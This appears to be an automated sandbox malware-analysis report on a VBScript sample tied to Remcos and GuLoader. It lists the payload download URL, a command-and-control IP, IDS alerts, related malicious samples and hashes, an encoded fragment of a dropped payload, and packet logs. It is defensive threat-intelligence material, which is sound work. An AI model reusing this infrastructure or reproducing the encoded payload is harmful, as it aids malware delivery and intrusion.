              https://of1x.icu/rxHEjEYE/Nickelization.csvXR0%Avira URL Cloudsafe
              http://of1x.icu0%Avira URL Cloudsafe
              https://of1x.icu/1%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              of1x.icu
              		172.67.216.143
              		truefalseunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://of1x.icu/rxHEjEYE/Nickelization.csvfalse
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1384945897.0000029110071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1593326524.000000000602B000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://of1x.icu/msiexec.exe, 0000000D.00000002.2546894323.000000000698A000.00000004.00000020.00020000.00000000.sdmpfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.1572573596.0000000005119000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://aka.ms/pscore6lBpowershell.exe, 0000000A.00000002.1572573596.0000000004FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.1572573596.0000000005119000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://go.micropowershell.exe, 00000002.00000002.1365512163.000002910133D000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://crl.microskmsiexec.exe, 0000000D.00000002.2546894323.00000000069FA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1716544458.0000000006A01000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://of1x.icu/rxHEjEYE/Nickelization.csvPpowershell.exe, 00000002.00000002.1365512163.0000029100226000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contoso.com/powershell.exe, 0000000A.00000002.1593326524.000000000602B000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1384945897.0000029110071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1593326524.000000000602B000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://of1x.icupowershell.exe, 00000002.00000002.1365512163.0000029101BD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1365512163.0000029100226000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/Licensepowershell.exe, 0000000A.00000002.1593326524.000000000602B000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/Iconpowershell.exe, 0000000A.00000002.1593326524.000000000602B000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://crl.microsoft.Hmsiexec.exe, 0000000D.00000002.2546894323.00000000069FA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1716544458.0000000006A01000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://aka.ms/pscore68powershell.exe, 00000002.00000002.1365512163.0000029100001000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1365512163.0000029100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1572573596.0000000004FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.1572573596.0000000005119000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://of1x.icupowershell.exe, 00000002.00000002.1365512163.0000029101C8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://of1x.icu/rxHEjEYE/Nickelization.csvXRpowershell.exe, 0000000A.00000002.1572573596.0000000005119000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      172.67.216.143
                                      		of1x.icuUnited States
                                      		13335CLOUDFLARENETUSfalse
                                      154.216.18.216
                                      		unknownSeychelles
                                      		135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1573519
                                      Start date and time:2024-12-12 07:53:12 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 6m 42s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:18
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:Strait STS.vbs
                                      Detection:MAL
                                      Classification:mal100.troj.expl.evad.winVBS@8/7@1/2
                                      EGA Information:Failed
                                      HCA Information:
                                      • Successful, ratio: 79%
                                      • Number of executed functions: 39
                                      • Number of non-executed functions: 18
                                      Cookbook Comments:
                                      • Found application associated with file extension: .vbs

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target powershell.exe, PID 2356 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 7452 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      01:54:08API Interceptor88x Sleep call for process: powershell.exe modified
                                      03:49:25API Interceptor431681x Sleep call for process: msiexec.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      154.216.18.216DT RDU KDFT0089.exeGet hashmaliciousRemcosBrowse

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        of1x.icuReqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 104.21.86.72

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        CLOUDFLARENETUSCaptcha.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                        • 172.67.206.64
                                        malware.ps1Get hashmaliciousMassLogger RATBrowse
                                        • 104.21.67.152
                                        https://analytics-prd.aws.wehaa.net/trackings?value=1&action=click&category=external&origin=detailpage&url=http://notifix.info/scales/ec49f59be146f69f3ea00c211d5cccd90524b2cf7f8aec665534fc020c910734b9e18d0945bd518a0e55b407c5bf7443cf6179/paige_williams@newyorker.com&cat=firstpage&label_item_id=9633&label_owner_id=646&label_url=http://notifix.info/scales/ec49f59be146f69f3ea00c211d5cccd90524b2cf7f8aec665534fc020c910734b9e18d0945bd518a0e55b407c5bf7443cf6179/paige_williams@newyorker.com&idle=8d15bf95831b32126e4b3bd02a20cf592eade0e3442422aeaf0db14b2e91ae186a5549c468519863594ece59910ee541&tenant=minnesotastate.jobsGet hashmaliciousCaptcha PhishBrowse
                                        • 104.21.80.1
                                        https://analytics-prd.aws.wehaa.net/trackings?value=1&action=click&category=external&origin=detailpage&url=http://notifix.info/scales/0af634fca2eaf3a11c0597691f5616c7d16f5580d650d17201024b374ebe92a8e0c492c822b6be6f4332bb93acc2ba02298f78/christa_sgobba@condenast.com&cat=firstpage&label_item_id=9633&label_owner_id=646&label_url=http://notifix.info/scales/0af634fca2eaf3a11c0597691f5616c7d16f5580d650d17201024b374ebe92a8e0c492c822b6be6f4332bb93acc2ba02298f78/christa_sgobba@condenast.com&idle=8d15bf95831b32126e4b3bd02a20cf592eade0e3442422aeaf0db14b2e91ae186a5549c468519863594ece59910ee541&tenant=minnesotastate.jobsGet hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                        • 172.67.157.142
                                        REMITTANCE_10023Tdcj.htmlGet hashmaliciousUnknownBrowse
                                        • 104.17.25.14
                                        phish_alert_iocp_v1.4.48 - 2024-12-11T151927.331.emlGet hashmaliciousUnknownBrowse
                                        • 104.17.25.14
                                        SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                        • 172.67.176.240
                                        jew.ppc.elfGet hashmaliciousUnknownBrowse
                                        • 104.16.155.85
                                        Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                        • 104.21.67.152
                                        https://newdocumentsproposal.webflow.io/Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                        • 172.64.151.8
                                        SKHT-ASShenzhenKatherineHengTechnologyInformationComips.elfGet hashmaliciousMiraiBrowse
                                        • 156.226.9.180
                                        https://u48551708.ct.sendgrid.net/ls/click?upn=u001.ztPEaTmy8WofhPYJ48HDSCunUq5pm5yTGRhe-2B0bVSngC8hMYiy6PgMy1xJOG8JJZaOsK-2FG9SE7UmhEzeQSXDmEf7Z3nlXZDH-2BW1HSMP6c8uYUvXDTaJRyLbPDV6bI3nnDyIlM0OJKevMwAF04rpfLmQEYS641NQTMU227kkOtBQgQK-2FNlHeN6DpPMLDgH6kuMS3X_2vbC1nrAFjePip8HYuHYOlkYXiy7Z-2FrO9MQN7lNoEgxRkovUJGAEvKvTFyRmFsa9AQlcDpFhpJzgHajMOC0yWTZOc2DdmxhrlyPvteyXbl8nlhAtf2p-2FHw4RnlZ8cxDY-2BWJeBsszGnsrXuNOI8LpL5ZYI3ad04OdxC8tHHA5tO-2Be1xS3Z9Z3VrOTM-2FT5ptoYnx5N-2FTYKQ13RZ-2FookVMhAtJ6OV43Zayd1qOmHGLwUI8-3DGet hashmaliciousPhisherBrowse
                                        • 154.216.20.188
                                        Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 154.216.18.62
                                        RH74mYjwoQ.elfGet hashmaliciousMiraiBrowse
                                        • 154.216.16.109
                                        tgCdafZIfZ.elfGet hashmaliciousMiraiBrowse
                                        • 154.216.16.109
                                        LiUgL2AoGI.elfGet hashmaliciousMiraiBrowse
                                        • 154.216.16.109
                                        hax.mpsl.elfGet hashmaliciousMiraiBrowse
                                        • 156.230.19.183
                                        16RIueF7yh.elfGet hashmaliciousMiraiBrowse
                                        • 154.216.16.109
                                        https://listafrica.org/Receipt.htmlGet hashmaliciousWinSearchAbuseBrowse
                                        • 154.216.17.175
                                        nshppc.elfGet hashmaliciousMiraiBrowse
                                        • 156.241.11.54

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        3b5074b1b5d032e5620f69f9f700ff0eShipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                        • 172.67.216.143
                                        https://computeroids.com/hp-printer-driver?utm_source=Google&utm_medium=Click&utm_campaign=HP&utm_term=%7Bkeywords%7D&utm_content=%7Bmedium%7D&tm=tt&ap=gads&aaid=adaHxflMmgPq7&camp_id=12260099411&ad_g_id=118845692873&keyword=install%20hp%20printer%20to%20computer&device=c&network=searchAd&adposition=&gad_source=5&gclid=EAIaIQobChMI0JDUvuabigMV_Uf_AR2MuQCMEAAYASAAEgKQMPD_BwEGet hashmaliciousPureLog StealerBrowse
                                        • 172.67.216.143
                                        https://owotabua.cloudfederalservices.com/F3A4kGet hashmaliciousUnknownBrowse
                                        • 172.67.216.143
                                        https://securee103.z13.web.core.windows.net/winside/00Windbndktw0win11advance/index.html#Get hashmaliciousTechSupportScamBrowse
                                        • 172.67.216.143
                                        c2.htaGet hashmaliciousXWormBrowse
                                        • 172.67.216.143
                                        Agreement ATT Confidential -16_08_52-{DATE).docxGet hashmaliciousUnknownBrowse
                                        • 172.67.216.143
                                        T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 172.67.216.143
                                        wi86CSarYC.exeGet hashmaliciousDanaBotBrowse
                                        • 172.67.216.143
                                        wi86CSarYC.exeGet hashmaliciousDanaBotBrowse
                                        • 172.67.216.143
                                        37f463bf4616ecd445d4a1937da06e19c2.htaGet hashmaliciousXWormBrowse
                                        • 172.67.216.143
                                        peks66Iy06.exeGet hashmaliciousUnknownBrowse
                                        • 172.67.216.143
                                        XXHYneydvF.exeGet hashmaliciousUnknownBrowse
                                        • 172.67.216.143
                                        nt11qTrX4f.exeGet hashmaliciousUnknownBrowse
                                        • 172.67.216.143
                                        otsIBG7J9b.exeGet hashmaliciousUnknownBrowse
                                        • 172.67.216.143
                                        XgijTrY6No.exeGet hashmaliciousUnknownBrowse
                                        • 172.67.216.143
                                        nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                        • 172.67.216.143
                                        CcIlKT6XdC.exeGet hashmaliciousAmadey, PureLog Stealer, Stealc, VidarBrowse
                                        • 172.67.216.143
                                        PO_11100011211.Vbs.vbsGet hashmaliciousFormBookBrowse
                                        • 172.67.216.143
                                        Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 172.67.216.143

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):8003
                                        Entropy (8bit):4.840877972214509
                                        Encrypted:false
                                        SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                        MD5:106D01F562D751E62B702803895E93E0
                                        SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                        SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                        SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):1.1940658735648508
                                        Encrypted:false
                                        SSDEEP:3:NlllulDm0ll//Z:NllU6cl/
                                        MD5:DA1F22117B9766A1F0220503765A5BA5
                                        SHA1:D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
                                        SHA-256:BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
                                        SHA-512:520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:@...e.................................R..............@..........

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kgpcfixp.thm.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lymuuapl.w43.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qz5butft.vay.psm1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tv4kgrhm.m0c.ps1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Roaming\huguenotism.Bed

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                        Category:dropped
                                        Size (bytes):477528
                                        Entropy (8bit):5.946387611522241
                                        Encrypted:false
                                        SSDEEP:6144:XPg5EPAxyFahCnshuOZa/ifaSTJLdwB1TO+vCTPtvjjWfp88+G1w/Cmg393P:/gXyFsu/vxFOFNjip8n0XNP
                                        MD5:B26527026F5A26ED7BABDDB7E8D8B340
                                        SHA1:773235C6FA1CCB738DB217FE387259C8C4F70C79
                                        SHA-256:4F558A98BCBEA1F90ED0F74003698909DCAE021CCF2550F0309A7242F8CA7054
                                        SHA-512:A1A8715881D3E06D7C5D4F1AE552894F811591C0E3BEB0CAA602CFAEA957F67DA7FF3850EBD16B31443AAD6455F2CC12CB176A0A99C03608806113CF8F0A971A
                                        Malicious:false
                                        Preview:6wKtqHEBm7uv5RcA6wIloHEBmwNcJARxAZvrAr8EuVtFVspxAZtxAZuBwdMsyBDrAvJ7cQGbgfEuch7bcQGbcQGbcQGb6wKbhLrfUPrq6wImSOsCbx1xAZtxAZsxyusC47lxAZuJFAtxAZvrAsxI0eJxAZvrArtyg8EEcQGbcQGbgfkRTawCfM1xAZtxAZuLRCQE6wJH63EBm4nDcQGb6wKam4HDQQ9JAHEBm3EBm7ru49vZcQGbcQGbgfJtDmU7cQGbcQGbgfKD7b7i6wI6EOsC6XvrArEtcQGb6wIUvHEBm4sMEOsCa4xxAZuJDBPrArIycQGbQnEBm3EBm4H6mPwEAHXWcQGb6wL71IlcJAzrAqhD6wLRVoHtAAMAAOsCj5JxAZuLVCQIcQGb6wLlvYt8JARxAZtxAZuJ63EBm3EBm4HDnAAAAHEBm3EBm1NxAZtxAZtqQHEBm+sCSVyJ6+sCmbnrAjDXx4MAAQAAAEDHAusCyNJxAZuBwwABAADrAn53cQGbU3EBm3EBm4nrcQGb6wIA9Ym7BAEAAHEBm+sCehSBwwQBAABxAZtxAZtTcQGbcQGbav9xAZtxAZuDwgXrAvru6wI6KzH2cQGb6wKeBDHJ6wJ17OsCTvOLGusCSWLrArSqQesCpsfrAub8ORwKdfJxAZvrAmfeRusCDIbrAjtLgHwK+7h123EBm3EBm4tECvzrAgvL6wKUZinw6wK2BesCT7H/0nEBm3EBm7qY/AQAcQGb6wIUeTHAcQGbcQGbi3wkDHEBm+sCPUWBNAdV0BSo6wLRnnEBm4PABOsCAszrAkA/OdB143EBm3EBm4n7cQGb6wLQrv/X6wLlN3EBm73QFKhV6MfzbBGQXdw10+2L8PYbpVF5dpZTl0rUpcqPLWRHKSAObo3RjVhXGA5hUgBZ8ZCMaYpAYIMsatQR1q8cLJVZSiEvedE1lUEy0VE21S8AbxHdFIy0VwEpId0U+g4ySSisipXcWNAH

                                        Static File Info

                                        General

                                        File type:ASCII text, with very long lines (347), with CRLF line terminators
                                        Entropy (8bit):4.971558176602615
                                        TrID:
                                          File name:Strait STS.vbs
                                          File size:64'296 bytes
                                          MD5:e6c71bbe4f758fb7c79ac21e9c514977
                                          SHA1:8a491650c20b51b8ccaeb4d76464b01ab1f15ef7
                                          SHA256:96e58c4ebcebd2972a1f50671fe2c43a89caa4c078767952ddcade51985d4a3f
                                          SHA512:e2bc84942acdf9af4afac209f6d3950572eb6eb595e4720cbd3f24e1906a204e4e3fe6867d9d7ecb54166154b5c753662b017c52e3b50c3e38df93bb1c70a59a
                                          SSDEEP:1536:Ddt+UfF7Uvx4GHZg40xnsg07lyODovbB1sRirf5:5MUdq4GGJxszCvbBcirx
                                          TLSH:28535AA3EF65064B0D8E2799FD651F06C5BCC108552769F6FEE9074DA00A89CB3BE20D
                                          File Content Preview:..'Billedlotterierne: haircut kuldsejles! henstilledes antitoksinet..'Remerging journaliseringsfunktionens, unsaint? udforskningerne;..'Sends! eppy. lovgennemgangs,..'Undervisningsmateriellers! sensibiliseret! guldgrubernes. helsingborgs. chefforhandlerne

                                          File Icon

                                          Icon Hash:68d69b8f86ab9a86

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-12-12T07:54:02.268298+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.749946154.216.18.2162404TCP
                                          2024-12-12T07:54:52.755878+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749776172.67.216.143443TCP
                                          2024-12-12T07:55:17.429700+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.749786154.216.18.2162404TCP
                                          2024-12-12T07:55:40.476958+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.749841154.216.18.2162404TCP
                                          2024-12-12T07:56:03.524506+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.749894154.216.18.2162404TCP

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 12, 2024 07:54:09.672216892 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:09.672266960 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:09.672336102 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:09.679029942 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:09.679059029 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:10.901593924 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:10.901671886 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:10.906960964 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:10.906971931 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:10.907262087 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:10.932426929 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:10.979327917 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.563483000 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.563579082 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.563625097 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.563728094 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:11.563752890 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.563823938 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:11.564093113 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.564749002 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.564821005 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:11.564831018 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.578814983 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.578895092 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:11.578905106 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.587074041 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.587341070 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:11.587352037 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.627814054 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:11.682696104 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.737245083 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:11.737261057 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.759866953 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.759970903 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:11.759982109 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.767291069 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.767352104 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:11.767376900 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.774969101 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.775032997 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:11.775059938 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.782902956 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.783065081 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:11.783076048 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.790920973 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.791039944 CET49699443192.168.2.7172.67.216.143
